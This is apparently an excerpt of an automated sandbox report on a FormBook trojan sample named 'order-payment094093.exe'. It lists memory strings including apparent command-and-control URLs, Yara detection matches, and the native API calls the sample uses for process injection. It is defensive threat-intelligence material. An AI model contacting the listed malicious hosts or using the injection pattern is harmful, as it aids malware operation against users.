Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teramilab.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuskerlogix.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuskerlogix.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuskerlogix.com/hd05/www.businessjp6-51399.info
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tuskerlogix.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uniqueofferss.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uniqueofferss.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uniqueofferss.com/hd05/www.lovepox.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uniqueofferss.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.com
Source: explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.comReferer:
Source: explorer.exe, 0000000A.00000002.3327443671.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979100485.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076446075.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2147208356.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000A.00000002.3330304405.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2151506615.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 0000000A.00000000.2151506615.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330512018.000000000C072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979706024.000000000C06D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 0000000A.00000000.2151506615.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330512018.000000000C072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979706024.000000000C06D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 0000000A.00000000.2151506615.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330304405.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000002.3327443671.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979100485.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076446075.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2147208356.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 0000000A.00000000.2151506615.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330512018.000000000C072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979706024.000000000C06D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: order-payment094093.exe, NFOLsr.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 0000000A.00000002.3320079951.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3333395951.0000000011211000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: order-payment094093.exe PID: 1136, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: order-payment094093.exe PID: 5016, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: explorer.exe PID: 1612, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 3136, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: order-payment094093.exe

Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A360 NtCreateFile,	9_2_0041A360
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A410 NtReadFile,	9_2_0041A410
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A490 NtClose,	9_2_0041A490
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A540 NtAllocateVirtualMemory,	9_2_0041A540
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A45B NtReadFile,	9_2_0041A45B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A40B NtReadFile,	9_2_0041A40B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A48C NtClose,	9_2_0041A48C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041A53A NtAllocateVirtualMemory,	9_2_0041A53A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262B60 NtClose,LdrInitializeThunk,	9_2_01262B60
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01262BF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262AD0 NtReadFile,LdrInitializeThunk,	9_2_01262AD0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_01262D30
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_01262D10
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01262DF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262DD0 NtDelayExecution,LdrInitializeThunk,	9_2_01262DD0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01262C70
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_01262CA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262F30 NtCreateSection,LdrInitializeThunk,	9_2_01262F30
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262FB0 NtResumeThread,LdrInitializeThunk,	9_2_01262FB0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262F90 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01262F90
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262FE0 NtCreateFile,LdrInitializeThunk,	9_2_01262FE0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01262EA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_01262E80
